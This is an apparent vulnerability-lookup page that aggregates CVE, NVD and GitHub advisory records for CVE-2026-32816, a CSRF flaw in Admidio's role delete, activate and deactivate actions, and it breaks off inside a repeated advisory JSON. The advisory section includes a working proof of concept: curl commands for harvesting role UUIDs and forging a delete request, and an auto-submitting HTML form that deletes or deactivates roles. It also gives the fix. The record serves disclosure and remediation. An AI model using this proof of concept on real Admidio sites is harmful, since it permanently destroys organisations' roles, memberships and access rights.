Vulnerability-Lookup

CVE-2026-32816 (GCVE-0-2026-32816)

Vulnerability from cvelistv5 – Published: 2026-03-19 22:57 – Updated: 2026-03-20 17:29

Title

Admidio has Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions

Summary

Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST["adm_csrf_token"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7.

Severity ?

5.7 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/Admidio/admidio/security/advis…	x_refsource_CONFIRM
	https://github.com/Admidio/admidio/releases/tag/v5.0.7	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	Admidio	admidio	Affected: >= 5.0.0, < 5.0.7

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32816",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-20T17:26:42.937028Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-20T17:29:42.359Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "admidio",
          "vendor": "Admidio",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.0.7"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\"adm_csrf_token\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352: Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-19T22:57:19.068Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2"
        },
        {
          "name": "https://github.com/Admidio/admidio/releases/tag/v5.0.7",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7"
        }
      ],
      "source": {
        "advisory": "GHSA-wwg8-6ffr-h4q2",
        "discovery": "UNKNOWN"
      },
      "title": "Admidio has Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32816",
    "datePublished": "2026-03-19T22:57:19.068Z",
    "dateReserved": "2026-03-16T17:35:36.696Z",
    "dateUpdated": "2026-03-20T17:29:42.359Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-32816\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-19T23:16:44.380\",\"lastModified\":\"2026-03-23T19:10:21.587\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\\\"adm_csrf_token\\\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7.\"},{\"lang\":\"es\",\"value\":\"Admidio es una soluci\u00f3n de gesti\u00f3n de usuarios de c\u00f3digo abierto. En las versiones 5.0.0 a 5.0.6, los modos de eliminar, activar y desactivar en modules/groups-roles/groups_roles.php realizan cambios de estado destructivos en los roles organizacionales, pero nunca validan un token anti-CSRF. La interfaz de usuario del cliente (UI) pasa un token CSRF a callUrlHideElement(), que lo incluye en el cuerpo de la solicitud POST, pero los manejadores del servidor ignoran $_POST[\\\"adm_csrf_token\\\"] por completo para estos tres modos. Un atacante que pueda descubrir un UUID de rol (visible en la vista p\u00fablica de tarjetas cuando el m\u00f3dulo es accesible p\u00fablicamente) puede incrustar un formulario POST falsificado en cualquier p\u00e1gina externa y enga\u00f1ar a cualquier usuario con el derecho rol_assign_roles para que elimine o alterne roles para la organizaci\u00f3n. La eliminaci\u00f3n de roles es permanente y se propaga a todas las membres\u00edas, asociaciones de eventos y datos de derechos. Si se explota, un atacante puede enga\u00f1ar a cualquier usuario con derechos delegados de asignaci\u00f3n de roles para que elimine roles de forma permanente, revoque masivamente todas las membres\u00edas asociadas y el acceso a eventos, documentos y listas de correo, o active o desactive silenciosamente grupos enteros, con los UUID de rol objetivo f\u00e1cilmente obtenidos de la vista p\u00fablica de tarjetas no autenticada y sin una ruta de deshacer que no sea una restauraci\u00f3n de la base de datos. Este problema ha sido solucionado en la versi\u00f3n 5.0.7.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N\",\"baseScore\":5.7,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.1,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"5.0.0\",\"versionEndExcluding\":\"5.0.7\",\"matchCriteriaId\":\"4020E2FE-8E51-405F-86CB-DAAFBA7FD9B3\"}]}]}],\"references\":[{\"url\":\"https://github.com/Admidio/admidio/releases/tag/v5.0.7\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"Admidio has Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions\", \"source\": {\"advisory\": \"GHSA-wwg8-6ffr-h4q2\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"Admidio\", \"product\": \"admidio\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 5.0.0, \u003c 5.0.7\"}]}], \"references\": [{\"url\": \"https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2\", \"name\": \"https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/Admidio/admidio/releases/tag/v5.0.7\", \"name\": \"https://github.com/Admidio/admidio/releases/tag/v5.0.7\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\\\"adm_csrf_token\\\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-19T22:57:19.068Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32816\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-20T17:26:42.937028Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-03-20T17:29:28.902Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-32816\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-19T22:57:19.068Z\", \"dateReserved\": \"2026-03-16T17:35:36.696Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-19T22:57:19.068Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-32816

Vulnerability from fkie_nvd - Published: 2026-03-19 23:16 - Updated: 2026-03-23 19:10

Severity ?

5.7 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/Admidio/admidio/releases/tag/v5.0.7	Product, Release Notes
	security-advisories@github.com	https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	admidio	admidio	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4020E2FE-8E51-405F-86CB-DAAFBA7FD9B3",
              "versionEndExcluding": "5.0.7",
              "versionStartIncluding": "5.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, the delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST[\"adm_csrf_token\"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data. If exploited, an attacker can trick any user with delegated role-assignment rights into permanently deleting roles, mass-revoking all associated memberships and access to events, documents, and mailing lists, or silently activating or deactivating entire groups, with target role UUIDs trivially harvested from the unauthenticated public cards view and no undo path short of a database restore. This issue has been fixed in version 5.0.7."
    },
    {
      "lang": "es",
      "value": "Admidio es una soluci\u00f3n de gesti\u00f3n de usuarios de c\u00f3digo abierto. En las versiones 5.0.0 a 5.0.6, los modos de eliminar, activar y desactivar en modules/groups-roles/groups_roles.php realizan cambios de estado destructivos en los roles organizacionales, pero nunca validan un token anti-CSRF. La interfaz de usuario del cliente (UI) pasa un token CSRF a callUrlHideElement(), que lo incluye en el cuerpo de la solicitud POST, pero los manejadores del servidor ignoran $_POST[\"adm_csrf_token\"] por completo para estos tres modos. Un atacante que pueda descubrir un UUID de rol (visible en la vista p\u00fablica de tarjetas cuando el m\u00f3dulo es accesible p\u00fablicamente) puede incrustar un formulario POST falsificado en cualquier p\u00e1gina externa y enga\u00f1ar a cualquier usuario con el derecho rol_assign_roles para que elimine o alterne roles para la organizaci\u00f3n. La eliminaci\u00f3n de roles es permanente y se propaga a todas las membres\u00edas, asociaciones de eventos y datos de derechos. Si se explota, un atacante puede enga\u00f1ar a cualquier usuario con derechos delegados de asignaci\u00f3n de roles para que elimine roles de forma permanente, revoque masivamente todas las membres\u00edas asociadas y el acceso a eventos, documentos y listas de correo, o active o desactive silenciosamente grupos enteros, con los UUID de rol objetivo f\u00e1cilmente obtenidos de la vista p\u00fablica de tarjetas no autenticada y sin una ruta de deshacer que no sea una restauraci\u00f3n de la base de datos. Este problema ha sido solucionado en la versi\u00f3n 5.0.7."
    }
  ],
  "id": "CVE-2026-32816",
  "lastModified": "2026-03-23T19:10:21.587",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.7,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.1,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-19T23:16:44.380",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/Admidio/admidio/releases/tag/v5.0.7"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/Admidio/admidio/security/advisories/GHSA-wwg8-6ffr-h4q2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-WWG8-6FFR-H4Q2

Vulnerability from github – Published: 2026-03-16 21:17 – Updated: 2026-03-20 21:15

Summary

Admidio is Missing CSRF Validation on Role Delete, Activate, and Deactivate Actions

Details

Summary

The delete, activate, and deactivate modes in modules/groups-roles/groups_roles.php perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to callUrlHideElement(), which includes it in the POST body, but the server-side handlers ignore $_POST["adm_csrf_token"] entirely for these three modes. An attacker who can discover a role UUID (visible in the public cards view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the rol_assign_roles right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.

Details

CSRF Token Is Sent but Never Validated

File: D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php, lines 150-173

The save mode (lines 143-148) is CSRF-protected via RolesService::save() which calls getFormObject($_POST["adm_csrf_token"])->validate(). The delete, activate, and deactivate modes receive no equivalent protection:

case 'delete':
    // delete role from database
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    if ($role->delete()) {
        echo json_encode(array('status' => 'success'));
    }
    break;

case 'activate':
    // set role active
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    $role->activate();
    echo 'done';
    break;

case 'deactivate':
    // set role inactive
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    $role->deactivate();
    echo 'done';
    break;

The only input validated is $getRoleUUID at line 41, checked as a 'uuid' type. This prevents SQL injection but provides no CSRF protection.

Client-Side UI Passes Token; Server Ignores It

File: D:/bugcrowd/admidio/repo/system/js/common_functions.js, lines 101-129

The presenter embeds the CSRF token into the JavaScript callUrlHideElement() call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:

function callUrlHideElement(elementId, url, csrfToken, callback) {
    $.post(url, {
        "adm_csrf_token": csrfToken,  // sent in POST body
        "uuid": elementId
    }, function(data) { ... });
}

The server-side handler reads mode from $_GET but never reads or validates $_POST["adm_csrf_token"] for delete, activate, or deactivate. An attacker omits the token field entirely; the server does not check for its presence.

Who Can Be the CSRF Victim

File: D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php, lines 49-54

if ($getMode !== 'cards') {
    // only users with the special right are allowed to manage roles
    if (!$gCurrentUser->isAdministratorRoles()) {
        throw new Exception('SYS_NO_RIGHTS');
    }
}

isAdministratorRoles() maps to checkRolesRight('rol_assign_roles'). This is a delegated organizational right, not full system administrator (isAdministrator()) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.

Role UUIDs Are Discoverable Without Authentication

File: D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php, line 84

$templateRow['id'] = 'role_' . $role->getValue('rol_uuid');

The cards mode (the default view) does not require the rol_assign_roles right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.

Role::delete() Is Permanent and Cascading

File: D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php, lines 264-288

$this->db->startTransaction();

// Remove all role dependency relationships
$sql = 'DELETE FROM ' . TBL_ROLE_DEPENDENCIES . ' WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?';
$this->db->queryPrepared($sql, array($rolId, $rolId));

// Remove all memberships
$sql = 'DELETE FROM ' . TBL_MEMBERS . ' WHERE mem_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));

// Disassociate all events linked to this role
$sql = 'UPDATE ' . TBL_EVENTS . ' SET dat_rol_id = NULL WHERE dat_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));

// Remove all access-right entries for this role
$sql = 'DELETE FROM ' . TBL_ROLES_RIGHTS_DATA . ' WHERE rrd_rol_id = ?';
$this->db->queryPrepared($sql, array($rolId));

There is no soft-delete or recycle bin. Deletion permanently removes the role record, all memberships within it, all role dependency rules, and all per-module access rights granted to the role.

PoC

The attacker hosts the following HTML page and tricks a user with the rol_assign_roles right into visiting it while logged in to Admidio.

Step 1: Collect role UUIDs from the public cards view (no login required)

curl "https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=cards"

Role UUIDs appear in the HTML source as element IDs (id="role_<UUID>") and in action data attributes.

Step 2: Forge a deletion request (no CSRF token needed)

curl -X POST \\
  "https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID" \\
  -H "Cookie: ADMIDIO_SESSION_ID=victim_session" \\
  -d ""

Expected response: {"status":"success"}

The role, all its memberships, all event associations, and all access-right entries are permanently deleted. No adm_csrf_token field is required.

Step 3 (CSRF delivery -- attacker hosts externally)

<!DOCTYPE html>
<html>
<body onload="document.getElementById('f').submit()">
  <form id="f" method="POST"
        action="https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=delete&role_uuid=ROLE_UUID">
    <!-- No adm_csrf_token field needed -->
  </form>
</body>
</html>

When any user with rol_assign_roles views this page while authenticated, the targeted role is permanently deleted without any confirmation from the victim.

Step 4 (Deactivate via CSRF -- disables a role without deleting it)

<form id="f" method="POST"
      action="https://TARGET/adm_program/modules/groups-roles/groups_roles.php?mode=deactivate&role_uuid=ROLE_UUID">
</form>

Deactivating a role removes all active members from the role and hides it, effectively revoking access for all members without destroying the role record.

Impact

Permanent Role Deletion: A CSRF-triggered delete request irrecoverably removes the targeted role and all associated memberships, event links, and permission grants. There is no undo path other than a database restore.
Mass Membership Revocation: Every member of the deleted role loses their membership record simultaneously. Role membership in Admidio controls access to events, document folders, mailing lists, and custom profile-field visibility.
Role State Manipulation: An attacker can force activate or deactivate on any role. Deactivation silently strips access from an entire group without deleting the role record.
Low Attack Surface Requirement: The attacker only needs to trick a user with the delegated rol_assign_roles right -- not a full system administrator. Such users are common in organizations that delegate group management to department heads or committee chairs.
UUID Pre-Collection Without Authentication: Role UUIDs are harvested from the public cards view before the CSRF attack is staged, making target selection trivial.

Recommended Fix

Add SecurityUtils::validateCsrfToken($_POST["adm_csrf_token"]) at the beginning of each vulnerable case, consistent with how other mutative actions in the codebase are protected.

// File: modules/groups-roles/groups_roles.php

case 'delete':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    if ($role->delete()) {
        echo json_encode(array('status' => 'success'));
    }
    break;

case 'activate':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    $role->activate();
    echo 'done';
    break;

case 'deactivate':
    SecurityUtils::validateCsrfToken($_POST['adm_csrf_token']);
    $role = new Role($gDb);
    $role->readDataByUuid($getRoleUUID);
    $role->deactivate();
    echo 'done';
    break;

Since callUrlHideElement already sends adm_csrf_token in the POST body, adding the server-side validation call is a one-line fix per case and requires no changes to the front-end JavaScript or templates.

Severity ?

5.7 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.0.6"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "admidio/admidio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.0.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32816"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-16T21:17:09Z",
    "nvd_published_at": "2026-03-19T23:16:44Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe `delete`, `activate`, and `deactivate` modes in `modules/groups-roles/groups_roles.php` perform destructive state changes on organizational roles but never validate an anti-CSRF token. The client-side UI passes a CSRF token to `callUrlHideElement()`, which includes it in the POST body, but the server-side handlers ignore `$_POST[\"adm_csrf_token\"]` entirely for these three modes. An attacker who can discover a role UUID (visible in the public `cards` view when the module is publicly accessible) can embed a forged POST form on any external page and trick any user with the `rol_assign_roles` right into deleting or toggling roles for the organization. Role deletion is permanent and cascades to all memberships, event associations, and rights data.\n\n## Details\n\n### CSRF Token Is Sent but Never Validated\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 150-173\n\nThe `save` mode (lines 143-148) is CSRF-protected via `RolesService::save()` which calls `getFormObject($_POST[\"adm_csrf_token\"])-\u003evalidate()`. The `delete`, `activate`, and `deactivate` modes receive no equivalent protection:\n\n```php\ncase \u0027delete\u0027:\n    // delete role from database\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    if ($role-\u003edelete()) {\n        echo json_encode(array(\u0027status\u0027 =\u003e \u0027success\u0027));\n    }\n    break;\n\ncase \u0027activate\u0027:\n    // set role active\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    $role-\u003eactivate();\n    echo \u0027done\u0027;\n    break;\n\ncase \u0027deactivate\u0027:\n    // set role inactive\n    $role = new Role($gDb);\n    $role-\u003ereadDataByUuid($getRoleUUID);\n    $role-\u003edeactivate();\n    echo \u0027done\u0027;\n    break;\n```\n\nThe only input validated is `$getRoleUUID` at line 41, checked as a `\u0027uuid\u0027` type. This prevents SQL injection but provides no CSRF protection.\n\n### Client-Side UI Passes Token; Server Ignores It\n\nFile: `D:/bugcrowd/admidio/repo/system/js/common_functions.js`, lines 101-129\n\nThe presenter embeds the CSRF token into the JavaScript `callUrlHideElement()` call (GroupsRolesPresenter.php line 131). The function sends it in an AJAX POST body:\n\n```javascript\nfunction callUrlHideElement(elementId, url, csrfToken, callback) {\n    $.post(url, {\n        \"adm_csrf_token\": csrfToken,  // sent in POST body\n        \"uuid\": elementId\n    }, function(data) { ... });\n}\n```\n\nThe server-side handler reads `mode` from `$_GET` but never reads or validates `$_POST[\"adm_csrf_token\"]` for `delete`, `activate`, or `deactivate`. An attacker omits the token field entirely; the server does not check for its presence.\n\n### Who Can Be the CSRF Victim\n\nFile: `D:/bugcrowd/admidio/repo/modules/groups-roles/groups_roles.php`, lines 49-54\n\n```php\nif ($getMode !== \u0027cards\u0027) {\n    // only users with the special right are allowed to manage roles\n    if (!$gCurrentUser-\u003eisAdministratorRoles()) {\n        throw new Exception(\u0027SYS_NO_RIGHTS\u0027);\n    }\n}\n```\n\n`isAdministratorRoles()` maps to `checkRolesRight(\u0027rol_assign_roles\u0027)`. This is a delegated organizational right, not full system administrator (`isAdministrator()`) access. Any member granted the right to manage roles -- for example, a volunteer coordinator or chapter secretary -- is a valid CSRF victim.\n\n### Role UUIDs Are Discoverable Without Authentication\n\nFile: `D:/bugcrowd/admidio/repo/src/UI/Presenter/GroupsRolesPresenter.php`, line 84\n\n```php\n$templateRow[\u0027id\u0027] = \u0027role_\u0027 . $role-\u003egetValue(\u0027rol_uuid\u0027);\n```\n\nThe `cards` mode (the default view) does not require the `rol_assign_roles` right and is publicly reachable when the module is enabled. Role UUIDs appear as HTML element IDs and in action data attributes in the page source. An unauthenticated visitor can collect all role UUIDs before staging the CSRF attack against a logged-in victim.\n\n### Role::delete() Is Permanent and Cascading\n\nFile: `D:/bugcrowd/admidio/repo/src/Roles/Entity/Role.php`, lines 264-288\n\n```php\n$this-\u003edb-\u003estartTransaction();\n\n// Remove all role dependency relationships\n$sql = \u0027DELETE FROM \u0027 . TBL_ROLE_DEPENDENCIES . \u0027 WHERE rld_rol_id_parent = ? OR rld_rol_id_child = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId, $rolId));\n\n// Remove all memberships\n$sql = \u0027DELETE FROM \u0027 . TBL_MEMBERS . \u0027 WHERE mem_rol_id = ?\u0027;\n$this-\u003edb-\u003equeryPrepared($sql, array($rolId));\n\n// Disassociate all events linked to this 